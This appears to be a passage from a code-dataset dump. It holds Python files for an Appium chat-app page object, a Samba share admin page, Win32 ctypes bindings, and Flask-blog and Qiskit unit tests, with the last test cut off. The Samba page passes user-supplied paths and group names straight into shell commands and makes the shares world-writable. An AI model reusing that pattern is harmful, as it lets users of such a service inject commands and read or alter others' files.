el = self.get_elements(self.__locators['定位_地图'])\n return len(el) > 0\n\n @TestLogger.log(\"撤回文件\")\n def recall_file(self, file):\n el = self.wait_until(condition=lambda x:self.get_element((MobileBy.XPATH, \"//*[contains(@text, '%s')]\" % file)))\n self.press(el)\n self.click_element(self.__class__.__locators['撤回'])\n\n @TestLogger.log(\"撤回位置消息\")\n def recall_loc_msg(self):\n el = self.wait_until(\n condition=lambda x: self.get_elements(self.__locators['定位_地图']))\n self.press(el[-1])\n self.click_element(self.__class__.__locators['撤回'])\n\n @TestLogger.log()\n def is_element_exit_(self, text):\n \"\"\"指定元素是否存在\"\"\"\n return self._is_element_present(self.__class__.__locators[text])\n\n @TestLogger.log()\n def click_element_(self, text):\n \"\"\"点击元素\"\"\"\n self.click_element(self.__class__.__locators[text])\n\n @TestLogger.log()\n def click_text_message_by_number(self, index=0):\n \"\"\"点击某一条文本消息\"\"\"\n els = self.get_elements(self.__class__.__locators[\"文本消息\"])\n els[index].click()\n\n @TestLogger.log()\n def click_last_text_message(self):\n \"\"\"点击最后一条文本消息\"\"\"\n self.click_element(self.__class__.__locators[\"最后一条文本消息\"])\n\n @TestLogger.log()\n def press_last_text_message(self):\n \"\"\"长按最后一条文本消息\"\"\"\n self.swipe_by_direction(self.__class__.__locators[\"最后一条文本消息\"], \"press\", 5)\n\n @TestLogger.log()\n def press_last_text_message_c(self):\n \"\"\"长按最后一条文本消息\"\"\"\n self.swipe_by_direction(self.__class__.__locators[\"最后一条文本消息_c\"], \"press\", 5)\n\n @TestLogger.log()\n def is_clear_the_input_box(self):\n \"\"\"输入框是否清空\"\"\"\n if self._is_element_present2(self.__class__.__locators['输入框']):\n el = self.get_element(self.__class__.__locators['输入框'])\n text = el.text\n if text is None:\n return True\n else:\n return False\n\n @TestLogger.log()\n def is_exists_text_by_input_box(self, text):\n \"\"\"输入框中是否存在指定文本\"\"\"\n if self._is_element_present2(self.__class__.__locators['输入框']):\n el = self.get_element(self.__class__.__locators['输入框'])\n message_text = el.text\n if text in message_text:\n return True\n else:\n return False\n\n @TestLogger.log()\n def get_message_record_number(self):\n \"\"\"获取消息记录数量\"\"\"\n if self._is_element_present2(self.__class__.__locators['消息记录']):\n els = self.get_elements(self.__class__.__locators['消息记录'])\n return len(els)\n else:\n return 0\n\n @TestLogger.log()\n def get_size_of_last_expression_message(self):\n \"\"\"获取最后一条表情消息表情的大小\"\"\"\n if self._is_element_present2(self.__class__.__locators['最后一条表情消息的表情']):\n el = self.get_element(self.__class__.__locators[\"最后一条表情消息的表情\"])\n rect = el.rect\n return rect[\"width\"], rect[\"height\"]\n\n @TestLogger.log()\n def press_file_by_type(self, file_type, index=-1):\n \"\"\"长按指定类型文件,默认选择最后一个\"\"\"\n locator = (MobileBy.IOS_PREDICATE, 'name ENDSWITH \"%s\"' % file_type)\n self.swipe_by_direction2(locator, \"press\", index, 5)\n\n @TestLogger.log()\n def click_delete_text(self):\n \"\"\"修改群名称清除文本\"\"\"\n self.click_element(self.__class__.__locators[\"修改群名称清除文本按钮\"])\n\n @TestLogger.log()\n def delete_text_button_is_enabled(self):\n \"\"\"清除文本按钮是否可点击\"\"\"\n return self._is_clickable(self.__class__.__locators['修改群名称清除文本按钮'])\n\n @TestLogger.log()\n def is_exists_element_by_text(self, text):\n \"\"\"是否存在指定元素\"\"\"\n return self._is_element_present2(self.__class__.__locators[text])\n\n\n\n @TestLogger.log()\n def is_enabled_element_by_text(self, text):\n \"\"\"指定元素是否可点击\"\"\"\n return self._is_enabled(self.__class__.__locators[text])\n\n @TestLogger.log()\n def click_element_by_text(self, text):\n \"\"\"点击指定元素\"\"\"\n self.click_element(self.__class__.__locators[text])\n\n @TestLogger.log()\n def get_element_value_by_text(self, text):\n \"\"\"获取指定元素的文本\"\"\"\n if self._is_element_present2(self.__class__.__locators[text]):\n el = self.get_element(self.__class__.__locators[text])\n return el.text\n\n @TestLogger.log()\n def click_my_group_name(self):\n \"\"\"点击我的群昵称\"\"\"\n self.click_element(self.__class__.__locators[\"我的群昵称\"])\n\n @TestLogger.log()\n def get_group_name_text(self):\n \"\"\"获取修改我的群昵称输入框文本\"\"\"\n text = self.get_element(self.__class__.__locators[\"我的群昵称输入框\"]).text\n return text\n\n @TestLogger.log()\n def is_exists_group_member_name(self, name):\n \"\"\"最后一条消息是否存在群成员昵称\"\"\"\n locator = (\n MobileBy.XPATH,\n '//XCUIElementTypeTable/XCUIElementTypeCell[last()]/XCUIElementTypeStaticText[@name=\"%s\"]' % name)\n return self._is_element_present2(locator)\n\n @TestLogger.log()\n def click_group_message(self):\n \"\"\"点击群短信\"\"\"\n self.click_element(self.__class__.__locators[\"群短信\"])\n\n @TestLogger.log()\n def is_element_exit_c(self, locator):\n \"\"\"指定元素是否存在\"\"\"\n try:\n if len(self.get_elements(self.__class__.__locators[locator])) > 0:\n return True\n else:\n return False\n except Exception:\n return False\n\n @TestLogger.log('获取控件文本')\n def get_element_text(self, locator):\n return self.get_text(self.__class__.__locators[locator])\n\n @TestLogger.log()\n def press_element_by_text(self, text):\n \"\"\"长按指定元素\"\"\"\n if self._is_element_present2(self.__class__.__locators[text]):\n self.swipe_by_direction(self.__class__.__locators[text], \"press\", 5)\n\n @TestLogger.log()\n def press_element_by_text2(self, text, index=-1):\n \"\"\"长按指定元素,默认选择最后一个\"\"\"\n if self._is_element_present2(self.__class__.__locators[text]):\n self.swipe_by_direction2(self.__class__.__locators[text], \"press\", index, 5)\n\n @TestLogger.log('判断消息记录是否存在消息记录')\n def is_element_present_mess(self):\n return self._is_element_present(self.__class__.__locators['我的电脑-聊天记录'])","sub_path":"pages/GroupChat.py","file_name":"GroupChat.py","file_ext":"py","file_size_in_byte":47689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"444113853","text":"from nevow import rend, loaders, tags\nfrom twisted.application import service, internet, strports\nfrom twisted.web import server, static\nfrom twisted.python import failure\nfrom nevow import inevow, rend, appserver, static, guard, url, loaders, stan\nfrom nevow.taglibrary import tabbedPane\nimport time, formal, LDAP, os\nimport Tree, Settings\nfrom Core import PageHelpers, confparse, Utils, WebUtils\nfrom Pages import Tools\n\nfrom twisted.python import log\n\ndef reloadSamba():\n def cont(_):\n return WebUtils.system(\"/etc/init.d/samba restart\")\n\n return WebUtils.system(Settings.BaseDir+'/configurator --samba').addBoth(cont)\n\nclass Shares(PageHelpers.DataTable):\n def getTable(self):\n headings = [\n ('Share Name', 'share'), \n ('Shared Path', 'path'), \n ('Comment', 'comment'), \n ('Writable', 'writable'), \n ('Public', 'public'),\n ('Permission', 'group')\n ]\n sharesconf = self.sysconf.SambaShares\n\n shares = []\n\n for share in sharesconf.keys():\n if share==\"global\":\n continue\n\n row = [share]\n for i in ['path', 'comment', 'writable', 'public','valid users']:\n sdata = sharesconf[share].get(i, \"\")\n if i == 'valid users':\n sdata = sdata.replace('@', '').replace('\"', '').replace(',root', '').strip()\n\n row.append(sdata)\n\n shares.append(row)\n\n return headings, shares\n\n def addForm(self, form):\n form.addField('share', formal.String(required=True), label = \"Shared Folder\")\n form.addField('path', formal.String(required=True), label = \"Shared Path\", description = \"Path to be shared\")\n form.addField('comment', formal.String(required=True), label = \"Comment\")\n\n form.addField('public', formal.Boolean(), label = \"Public\")\n form.addField('writable', formal.Boolean(), label = \"Writable\")\n\n l = LDAP.createLDAPConnection(Settings.LDAPServer, 'o='+Settings.LDAPBase, Settings.LDAPManager, Settings.LDAPPass)\n dc = \"%s,o=%s\" % (LDAP.domainToDC(Settings.defaultDomain), Settings.LDAPBase)\n\n groups = LDAP.getGroups(l, dc)\n groups.sort()\n \n form.addField('group', formal.String(), \n formal.widgetFactory(formal.SelectChoice, options = [(i[1],i[1]) for i in groups]), \n label = \"Required Group\")\n \n def addAction(self, data):\n if \"/\" in data['path']:\n if data['path'][0] == \"/\": # Starts with a /\n path = data['path']\n else:\n path = \"/var/lib/samba/data/%s\" % data['path']\n else:\n path = '/var/lib/samba/data/%s' % data['path']\n \n share = {} #[%s]\\n\" % (data['share'],)\n share[\"path\"] = path\n share[\"comment\"] = data['comment']\n share[\"create mode\"] = '664'\n share[\"directory mode\"] = '775'\n share[\"nt acl support\"] = 'yes'\n WebUtils.system('mkdir -p %s' % path)\n \n if data['public']:\n share[\"public\"] = \"yes\"\n\n if data['writable']:\n share[\"writable\"] = \"yes\"\n\n if data['group']:\n share[\"valid users\"] = '@\"%s\",root' % data['group']\n WebUtils.system('chown -R root:\"%s\" %s' % (data['group'], path))\n\n WebUtils.system('chmod a+rwx %s' % path)\n WebUtils.system('chmod -R a+rw %s' % path)\n\n shares = self.sysconf.SambaShares\n shares[data['share'].encode(\"ascii\", \"replace\")] = share\n self.sysconf.SambaShares = shares\n \n def deleteItem(self, item):\n shares = self.getTable()[1]\n\n target = shares[item]\n\n name = target[0]\n\n shares = self.sysconf.SambaShares\n del shares[name]\n self.sysconf.SambaShares = shares\n\n def returnAction(self, data):\n Utils.log.msg('%s added file share %s' % (self.avatarId.username, repr(data)))\n return reloadSamba().addBoth(lambda _: url.root.child('Samba'))\n\nclass Page(Tools.Page):\n def __init__(self, *a, **kw):\n Tools.Page.__init__(self, *a, **kw)\n self.shareTable = Shares(self, 'Shares', 'share')\n\n def render_content(self, ctx, data):\n \n return ctx.tag[\n tags.h3[tags.img(src=\"/images/sharefold.png\"), \" Shared folders\"],\n self.shareTable.applyTable(self)\n ]\n","sub_path":"tums/trunk/release/Pages/Samba.py","file_name":"Samba.py","file_ext":"py","file_size_in_byte":4394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"502305960","text":"from ctypes import POINTER\nfrom ctypes import WINFUNCTYPE\nfrom ctypes import c_int\nfrom ctypes import c_int64\nfrom ctypes import c_void_p\nfrom ctypes import windll\nfrom ctypes.wintypes import ATOM\nfrom ctypes.wintypes import BOOL\nfrom ctypes.wintypes import DWORD\nfrom ctypes.wintypes import HANDLE\nfrom ctypes.wintypes import HBITMAP\nfrom ctypes.wintypes import HDC\nfrom ctypes.wintypes import HGDIOBJ\nfrom ctypes.wintypes import HINSTANCE\nfrom ctypes.wintypes import HMENU\nfrom ctypes.wintypes import HMODULE\nfrom ctypes.wintypes import HWND\nfrom ctypes.wintypes import LPARAM\nfrom ctypes.wintypes import LPCWSTR\nfrom ctypes.wintypes import LPPOINT\nfrom ctypes.wintypes import LPRECT\nfrom ctypes.wintypes import RECT\nfrom ctypes.wintypes import UINT\nfrom ctypes.wintypes import WPARAM\n\nINT_PTR = c_int64\n\nDLGPROC = WINFUNCTYPE(INT_PTR, HWND, UINT, WPARAM, LPARAM)\n\n# Window Styles\nWS_OVERLAPPED = 0x00000000\nWS_POPUP = 0x80000000\nWS_CHILD = 0x40000000\nWS_MINIMIZE = 0x20000000\nWS_VISIBLE = 0x10000000\nWS_DISABLED = 0x08000000\nWS_CLIPSIBLINGS = 0x04000000\nWS_CLIPCHILDREN = 0x02000000\nWS_MAXIMIZE = 0x01000000\nWS_CAPTION = 0x00C00000\nWS_BORDER = 0x00800000\nWS_DLGFRAME = 0x00400000\nWS_VSCROLL = 0x00200000\nWS_HSCROLL = 0x00100000\nWS_SYSMENU = 0x00080000\nWS_THICKFRAME = 0x00040000\nWS_GROUP = 0x00020000\nWS_TABSTOP = 0x00010000\nWS_MINIMIZEBOX = 0x00020000\nWS_MAXIMIZEBOX = 0x00010000\nWS_TILED = WS_OVERLAPPED\nWS_ICONIC = WS_MINIMIZE\nWS_SIZEBOX = WS_THICKFRAME\n\n# Extended Window Styles\nWS_EX_DLGMODALFRAME = 0x00000001\nWS_EX_NOPARENTNOTIFY = 0x00000004\nWS_EX_TOPMOST = 0x00000008\nWS_EX_ACCEPTFILES = 0x00000010\nWS_EX_TRANSPARENT = 0x00000020\nWS_EX_MDICHILD = 0x00000040\nWS_EX_TOOLWINDOW = 0x00000080\nWS_EX_WINDOWEDGE = 0x00000100\nWS_EX_CLIENTEDGE = 0x00000200\nWS_EX_CONTEXTHELP = 0x00000400\nWS_EX_RIGHT = 0x00001000\nWS_EX_LEFT = 0x00000000\nWS_EX_RTLREADING = 0x00002000\nWS_EX_LTRREADING = 0x00000000\nWS_EX_LEFTSCROLLBAR = 0x00004000\nWS_EX_RIGHTSCROLLBAR = 0x00000000\nWS_EX_CONTROLPARENT = 0x00010000\nWS_EX_STATICEDGE = 0x00020000\nWS_EX_APPWINDOW = 0x00040000\nWS_EX_LAYERED = 0x00080000\nWS_EX_NOINHERITLAYOUT = 0x00100000\nWS_EX_NOREDIRECTIONBITMAP = 0x00200000\nWS_EX_LAYOUTRTL = 0x00400000\nWS_EX_COMPOSITED = 0x02000000\nWS_EX_NOACTIVATE = 0x08000000\nWS_EX_PALETTEWINDOW = WS_EX_WINDOWEDGE | WS_EX_TOOLWINDOW | WS_EX_TOPMOST\n\n# Window Messages\nWM_CLOSE = 0x0010\nWM_CONTEXTMENU = 0x007B\nWM_KEYDOWN = 0x0100\nWM_INITDIALOG = 0x0110\nWM_COMMAND = 0x0111\n\n# Dialog Styles\nDS_SETFONT = 0x0040\nDS_MODALFRAME = 0x0080\nDS_CENTER = 0x0800\nDS_CENTERMOUSE = 0x1000\n\n# Dialog Box Command IDs\nIDOK = 1\nIDCANCEL = 2\nIDABORT = 3\nIDRETRY = 4\nIDIGNORE = 5\nIDYES = 6\nIDNO = 7\nIDCLOSE = 8\nIDHELP = 9\nIDTRYAGAIN = 10\nIDCONTINUE = 11\n\n# Static Control Constants\nSS_LEFT = 0x00000000\nSS_CENTER = 0x00000001\nSS_RIGHT = 0x00000002\nSS_ICON = 0x00000003\nSS_BLACKRECT = 0x00000004\nSS_GRAYRECT = 0x00000005\nSS_WHITERECT = 0x00000006\nSS_BLACKFRAME = 0x00000007\nSS_GRAYFRAME = 0x00000008\nSS_WHITEFRAME = 0x00000009\nSS_USERITEM = 0x0000000A\nSS_SIMPLE = 0x0000000B\nSS_LEFTNOWORDWRAP = 0x0000000C\nSS_OWNERDRAW = 0x0000000D\nSS_BITMAP = 0x0000000E\nSS_ENHMETAFILE = 0x0000000F\nSS_ETCHEDHORZ = 0x00000010\nSS_ETCHEDVERT = 0x00000011\nSS_ETCHEDFRAME = 0x00000012\nSS_TYPEMASK = 0x0000001F\nSS_REALSIZECONTROL = 0x00000040\nSS_NOPREFIX = 0x00000080\nSS_NOTIFY = 0x00000100\nSS_CENTERIMAGE = 0x00000200\nSS_RIGHTJUST = 0x00000400\nSS_REALSIZEIMAGE = 0x00000800\nSS_SUNKEN = 0x00001000\nSS_EDITCONTROL = 0x00002000\nSS_ENDELLIPSIS = 0x00004000\nSS_PATHELLIPSIS = 0x00008000\nSS_WORDELLIPSIS = 0x0000C000\nSS_ELLIPSISMASK = 0x0000C000\n\n# Edit Control Styles\nES_LEFT = 0x0000\nES_CENTER = 0x0001\nES_RIGHT = 0x0002\nES_MULTILINE = 0x0004\nES_UPPERCASE = 0x0008\nES_LOWERCASE = 0x0010\nES_PASSWORD = 0x0020\nES_AUTOVSCROLL = 0x0040\nES_AUTOHSCROLL = 0x0080\nES_NOHIDESEL = 0x0100\nES_OEMCONVERT = 0x0400\nES_READONLY = 0x0800\nES_WANTRETURN = 0x1000\nES_NUMBER = 0x2000\n\n# Menu flags\nMF_POPUP = 0x00000010\nMF_HILITE = 0x00000080\nMF_SEPARATOR = 0x00000800\n\n# SetWindowPos Flags\nSWP_NOSIZE = 0x0001\nSWP_NOMOVE = 0x0002\nSWP_NOZORDER = 0x0004\nSWP_NOREDRAW = 0x0008\nSWP_NOACTIVATE = 0x0010\nSWP_FRAMECHANGED = 0x0020\nSWP_SHOWWINDOW = 0x0040\nSWP_HIDEWINDOW = 0x0080\nSWP_NOCOPYBITS = 0x0100\nSWP_NOOWNERZORDER = 0x0200\nSWP_NOSENDCHANGING = 0x0400\nSWP_DEFERERASE = 0x2000\nSWP_ASYNCWINDOWPOS = 0x4000\n\n# DPI_AWARENESS_CONTEXT handle\nDPI_AWARENESS_CONTEXT_UNAWARE = -1\nDPI_AWARENESS_CONTEXT_SYSTEM_AWARE = -2\nDPI_AWARENESS_CONTEXT_PER_MONITOR_AWARE = -3\nDPI_AWARENESS_CONTEXT_PER_MONITOR_AWARE_V2 = -4\nDPI_AWARENESS_CONTEXT_UNAWARE_GDISCALED = -5\n\n_AdjustWindowRectExForDpi = windll.user32.AdjustWindowRectExForDpi\n_AdjustWindowRectExForDpi.argtypes = (LPRECT, DWORD, BOOL, DWORD, UINT)\n_AdjustWindowRectExForDpi.restype = BOOL\n\n_BitBlt = windll.gdi32.BitBlt\n_BitBlt.argtypes = (HDC, c_int, c_int, c_int, c_int, HDC, c_int, c_int, DWORD)\n_BitBlt.restype = BOOL\n\n_ClientToScreen = windll.user32.ClientToScreen\n_ClientToScreen.argtypes = (HWND, LPPOINT)\n_ClientToScreen.restype = BOOL\n\n_CreateCompatibleDC = windll.gdi32.CreateCompatibleDC\n_CreateCompatibleDC.argtypes = (HDC,)\n_CreateCompatibleDC.restype = HDC\n\n_CreateDIBSection = windll.gdi32.CreateDIBSection\n_CreateDIBSection.argtypes = (HDC, c_void_p, UINT, c_void_p, HANDLE, DWORD)\n_CreateDIBSection.restype = HBITMAP\n\n_DeleteDC = windll.gdi32.DeleteDC\n_DeleteDC.argtypes = (HDC,)\n_DeleteDC.restype = BOOL\n\n_DeleteObject = windll.gdi32.DeleteObject\n_DeleteObject.argtypes = (HGDIOBJ,)\n_DeleteObject.restype = BOOL\n\n_DestroyMenu = windll.user32.DestroyMenu\n_DestroyMenu.argtypes = (HMENU,)\n_DestroyMenu.restype = BOOL\n\n_DialogBoxIndirectParamW = windll.user32.DialogBoxIndirectParamW\n_DialogBoxIndirectParamW.argtypes = (HINSTANCE, c_void_p, HWND, c_void_p, LPARAM)\n_DialogBoxIndirectParamW.restype = INT_PTR\n\n_EndDialog = windll.user32.EndDialog\n_EndDialog.argtypes = (HWND, INT_PTR)\n_EndDialog.restype = BOOL\n\n_FindWindowW = windll.user32.FindWindowW\n_FindWindowW.argtypes = (LPCWSTR, LPCWSTR)\n_FindWindowW.restype = HWND\n\n_GetClassInfoExW = windll.user32.GetClassInfoExW\n_GetClassInfoExW.argtypes = (HINSTANCE, LPCWSTR, c_void_p)\n_GetClassInfoExW.restype = BOOL\n\n_GetClientRect = windll.user32.GetClientRect\n_GetClientRect.argtypes = (HWND, LPRECT)\n_GetClientRect.restype = BOOL\n\n_GetDC = windll.user32.GetDC\n_GetDC.argtypes = (HWND,)\n_GetDC.restype = HDC\n\n_GetDesktopWindow = windll.user32.GetDesktopWindow\n_GetDesktopWindow.restype = HWND\n\n_GetDlgItem = windll.user32.GetDlgItem\n_GetDlgItem.argtypes = (HWND, c_int)\n_GetDlgItem.restype = HWND\n\n_GetDlgItemInt = windll.user32.GetDlgItemInt\n_GetDlgItemInt.argtypes = (HWND, c_int, POINTER(BOOL), BOOL)\n_GetDlgItemInt.restype = UINT\n\n_GetDpiForWindow = windll.user32.GetDpiForWindow\n_GetDpiForWindow.argtypes = (HWND,)\n_GetDpiForWindow.restype = UINT\n\n_GetModuleHandleW = windll.kernel32.GetModuleHandleW\n_GetModuleHandleW.argtypes = (LPCWSTR,)\n_GetModuleHandleW.restype = HMODULE\n\n_GetParent = windll.user32.GetParent\n_GetParent.argtypes = (HWND,)\n_GetParent.restype = HWND\n\n_GetSubMenu = windll.user32.GetSubMenu\n_GetSubMenu.argtypes = (HMENU, c_int)\n_GetSubMenu.restype = HMENU\n\n_GetWindowDC = windll.user32.GetWindowDC\n_GetWindowDC.argtypes = (HWND,)\n_GetWindowDC.restype = HDC\n\n_GetWindowRect = windll.user32.GetWindowRect\n_GetWindowRect.argtypes = (HWND, LPRECT)\n_GetWindowRect.restype = BOOL\n\n_LoadMenuIndirectW = windll.user32.LoadMenuIndirectW\n_LoadMenuIndirectW.argtypes = (c_void_p,)\n_LoadMenuIndirectW.restype = HMENU\n\n_RegisterClassExW = windll.user32.RegisterClassExW\n_RegisterClassExW.argtypes = (c_void_p,)\n_RegisterClassExW.restype = ATOM\n\n_ReleaseDC = windll.user32.ReleaseDC\n_ReleaseDC.argtypes = (HWND, HDC)\n_ReleaseDC.restype = c_int\n\n_ScreenToClient = windll.user32.ScreenToClient\n_ScreenToClient.argtypes = (HWND, LPPOINT)\n_ScreenToClient.restype = BOOL\n\n_SelectObject = windll.gdi32.SelectObject\n_SelectObject.argtypes = (HDC, HGDIOBJ)\n_SelectObject.restype = HGDIOBJ\n\n_SetDlgItemInt = windll.user32.SetDlgItemInt\n_SetDlgItemInt.argtypes = (HWND, c_int, UINT, BOOL)\n_SetDlgItemInt.restype = BOOL\n\n_SetFocus = windll.user32.SetFocus\n_SetFocus.argtypes = (HWND,)\n_SetFocus.restype = HWND\n\n_SetThreadDpiAwarenessContext = windll.user32.SetThreadDpiAwarenessContext\n_SetThreadDpiAwarenessContext.argtypes = (c_void_p,)\n_SetThreadDpiAwarenessContext.restype = c_void_p\n\n_SetWindowPos = windll.user32.SetWindowPos\n_SetWindowPos.argtypes = (HWND, HWND, c_int, c_int, c_int, c_int, UINT)\n_SetWindowPos.restype = BOOL\n\n_SetWindowTextW = windll.user32.SetWindowTextW\n_SetWindowTextW.argtypes = (HWND, LPCWSTR)\n_SetWindowTextW.restype = BOOL\n\n_TrackPopupMenuEx = windll.user32.TrackPopupMenuEx\n_TrackPopupMenuEx.argtypes = (HMENU, UINT, c_int, c_int, HWND, POINTER(RECT))\n_TrackPopupMenuEx.restype = BOOL\n","sub_path":"transparentwindow/_win.py","file_name":"_win.py","file_ext":"py","file_size_in_byte":8736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"472762742","text":"import unittest\nimport mock \nfrom mock import patch\nfrom flaskblog.models import Post\nfrom flask import current_app\n\n\nclass PostModelTestCase(unittest.TestCase):\n def setUp(self):\n self.db = current_app.config['db']\n self.db.create_all()\n\n def tearDown(self):\n self.db.drop_all()\n\n def test_add_one_post(self):\n \"\"\"Test adding a record and retrieving all fields.\"\"\"\n Post.add('testfile.md', 'Test title','123','text1','tag1,tag2')\n self.assertEquals(1, len(Post.query.filter_by(filename='testfile.md').all()))\n\n p = Post.query.filter_by(filename='testfile.md').first()\n self.assertIsNotNone(p)\n self.assertEquals(1, p.id)\n self.assertEquals('testfile.md', p.filename)\n self.assertEquals('Test title', p.title)\n self.assertEquals(p.createTime, p.updateTime)\n self.assertEquals(123, p.createTime)\n self.assertEquals('test-title', p.urlslug)\n self.assertEquals('text1', p.text)\n self.assertEquals('tag1,tag2', p.tags)\n\n def test_update_post(self):\n \"\"\"Test adding a record and retrieving all fields.\"\"\"\n Post.add('testfile.md', 'Original Title', 123,'text1','tag1')\n p = Post.query.filter_by(filename='testfile.md').first()\n self.assertEquals('Original Title', p.title)\n \n Post.update('testfile.md','New Title',124,'textNew','tagsNew')\n\n p = Post.query.filter_by(filename='testfile.md').first()\n self.assertEquals('New Title', p.title)\n self.assertEquals(124, p.updateTime)\n self.assertEquals('textNew', p.text)\n self.assertEquals('tagsNew', p.tags)\n\n def helper_add_posts(self):\n Post.add('testfile1.md','1 Title','123','text1','tag111')\n Post.add('testfile2.md','2 Title','124','post text 2','tag2,tag222')\n Post.add('testfile3.md','3 Title','125','post text 3','tag3,tag222')\n Post.add('testfile4.md','4 Title','126','post text 4','tag4,tag222')\n Post.add('testfile5.md','5 Title','127','post text 5','tag4,tag222')\n\n def test_retrieve_first_page(self):\n \"\"\"Test retrieving a page of posts.\"\"\"\n self.helper_add_posts()\n\n results, _ = Post.getPosts()\n self.assertEquals('testfile5.md', results[0].filename)\n self.assertEquals('testfile4.md', results[1].filename)\n self.assertEquals('testfile3.md', results[2].filename)\n\n def test_retrieve_second_page(self):\n \"\"\"Test retrieving 2nd page of posts.\"\"\"\n self.helper_add_posts()\n\n results, _ = Post.getPosts(page=1, numPerPage=2)\n self.assertEquals(2, len(results))\n self.assertEquals('testfile3.md', results[0].filename)\n self.assertEquals('testfile2.md', results[1].filename)\n\n def test_get_post_by_slug(self):\n Post.add('testfile.md', 'Test title','123','text1','tag1')\n result = Post.getPostByField(slug='test-title')\n self.assertEquals(result, Post.query.filter_by(filename='testfile.md').first())\n\n def test_delete_post(self):\n Post.add('testfile.md', 'Test title','123','text1','tag1')\n record = Post.getPostByField(filename='testfile.md')\n self.assertEquals('testfile.md', record.filename)\n\n Post.deletePost(filename='testfile.md')\n record = Post.getPostByField(filename='testfile.md')\n self.assertEquals(None, record)\n\n def test_delete_all(self):\n Post.add('testfile.md', 'Test title','123','text1','tag1,tag2')\n results, _ = Post.getPosts()\n self.assertEquals(1, len(results))\n\n Post.deleteAll()\n results, _ = Post.getPosts()\n self.assertEquals(0, len(results))\n","sub_path":"flaskblog/tests/test_post_model.py","file_name":"test_post_model.py","file_ext":"py","file_size_in_byte":3668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"65560934","text":"# This code is part of Qiskit.\n#\n# (C) Copyright IBM 2021.\n#\n# This code is licensed under the Apache License, Version 2.0. You may\n# obtain a copy of this license in the LICENSE.txt file in the root directory\n# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.\n#\n# Any modifications or derivative works of this code must retain this\n# copyright notice, and modified files need to carry a notice indicating\n# that they have been altered from the originals.\n\n\"\"\"Data processor tests.\"\"\"\n\nimport numpy as np\n\nfrom qiskit.result.models import ExperimentResultData, ExperimentResult\nfrom qiskit.result import Result\nfrom qiskit.test import QiskitTestCase\nfrom qiskit.qobj.common import QobjExperimentHeader\nfrom qiskit_experiments import ExperimentData\nfrom qiskit_experiments.base_experiment import BaseExperiment\nfrom qiskit_experiments.data_processing.data_processor import DataProcessor\nfrom qiskit_experiments.data_processing.exceptions import DataProcessorError\nfrom qiskit_experiments.data_processing.nodes import (\n ToReal,\n ToImag,\n Probability,\n)\n\n\nclass FakeExperiment(BaseExperiment):\n \"\"\"Fake experiment class for testing.\"\"\"\n\n def __init__(self):\n \"\"\"Initialise the fake experiment.\"\"\"\n self._type = None\n super().__init__((0,), \"fake_test_experiment\")\n\n def circuits(self, backend=None, **circuit_options):\n \"\"\"Fake circuits.\"\"\"\n return []\n\n\nclass DataProcessorTest(QiskitTestCase):\n \"\"\"Class to test DataProcessor.\"\"\"\n\n def setUp(self):\n \"\"\"Setup variables used for testing.\"\"\"\n self.base_result_args = dict(\n backend_name=\"test_backend\",\n backend_version=\"1.0.0\",\n qobj_id=\"id-123\",\n job_id=\"job-123\",\n success=True,\n )\n\n mem1 = ExperimentResultData(\n memory=[\n [[1103260.0, -11378508.0], [2959012.0, -16488753.0]],\n [[442170.0, -19283206.0], [-5279410.0, -15339630.0]],\n [[3016514.0, -14548009.0], [-3404756.0, -16743348.0]],\n ]\n )\n\n mem2 = ExperimentResultData(\n memory=[\n [[5131962.0, -16630257.0], [4438870.0, -13752518.0]],\n [[3415985.0, -16031913.0], [2942458.0, -15840465.0]],\n [[5199964.0, -14955998.0], [4030843.0, -14538923.0]],\n ]\n )\n\n header1 = QobjExperimentHeader(\n clbit_labels=[[\"meas\", 0], [\"meas\", 1]],\n creg_sizes=[[\"meas\", 2]],\n global_phase=0.0,\n memory_slots=2,\n metadata={\"experiment_type\": \"fake_test_experiment\", \"x_values\": 0.0},\n )\n\n header2 = QobjExperimentHeader(\n clbit_labels=[[\"meas\", 0], [\"meas\", 1]],\n creg_sizes=[[\"meas\", 2]],\n global_phase=0.0,\n memory_slots=2,\n metadata={\"experiment_type\": \"fake_test_experiment\", \"x_values\": 1.0},\n )\n\n res1 = ExperimentResult(shots=3, success=True, meas_level=1, data=mem1, header=header1)\n res2 = ExperimentResult(shots=3, success=True, meas_level=1, data=mem2, header=header2)\n\n self.result_lvl1 = Result(results=[res1, res2], **self.base_result_args)\n\n raw_counts = {\"0x0\": 4, \"0x2\": 6}\n data = ExperimentResultData(counts=dict(**raw_counts))\n header = QobjExperimentHeader(\n metadata={\"experiment_type\": \"fake_test_experiment\"},\n clbit_labels=[[\"c\", 0], [\"c\", 1]],\n creg_sizes=[[\"c\", 2]],\n n_qubits=2,\n memory_slots=2,\n )\n res = ExperimentResult(shots=9, success=True, meas_level=2, data=data, header=header)\n self.exp_data_lvl2 = ExperimentData(FakeExperiment())\n self.exp_data_lvl2.add_data(Result(results=[res], **self.base_result_args))\n\n super().setUp()\n\n def test_empty_processor(self):\n \"\"\"Check that a DataProcessor without steps does nothing.\"\"\"\n data_processor = DataProcessor(\"counts\")\n\n datum = data_processor(self.exp_data_lvl2.data[0])\n self.assertEqual(datum, {\"00\": 4, \"10\": 6})\n\n datum, history = data_processor.call_with_history(self.exp_data_lvl2.data[0])\n self.assertEqual(datum, {\"00\": 4, \"10\": 6})\n self.assertEqual(history, [])\n\n def test_to_real(self):\n \"\"\"Test scaling and conversion to real part.\"\"\"\n processor = DataProcessor(\"memory\", [ToReal(scale=1e-3)])\n\n exp_data = ExperimentData(FakeExperiment())\n exp_data.add_data(self.result_lvl1)\n\n new_data = processor(exp_data.data[0])\n\n expected_old = {\n \"memory\": [\n [[1103260.0, -11378508.0], [2959012.0, -16488753.0]],\n [[442170.0, -19283206.0], [-5279410.0, -15339630.0]],\n [[3016514.0, -14548009.0], [-3404756.0, -16743348.0]],\n ],\n \"metadata\": {\"experiment_type\": \"fake_test_experiment\", \"x_values\": 0.0},\n }\n\n expected_new = np.array([[1103.26, 2959.012], [442.17, -5279.41], [3016.514, -3404.7560]])\n\n self.assertEqual(exp_data.data[0], expected_old)\n self.assertTrue(np.allclose(new_data, expected_new))\n\n # Test that we can call with history.\n new_data, history = 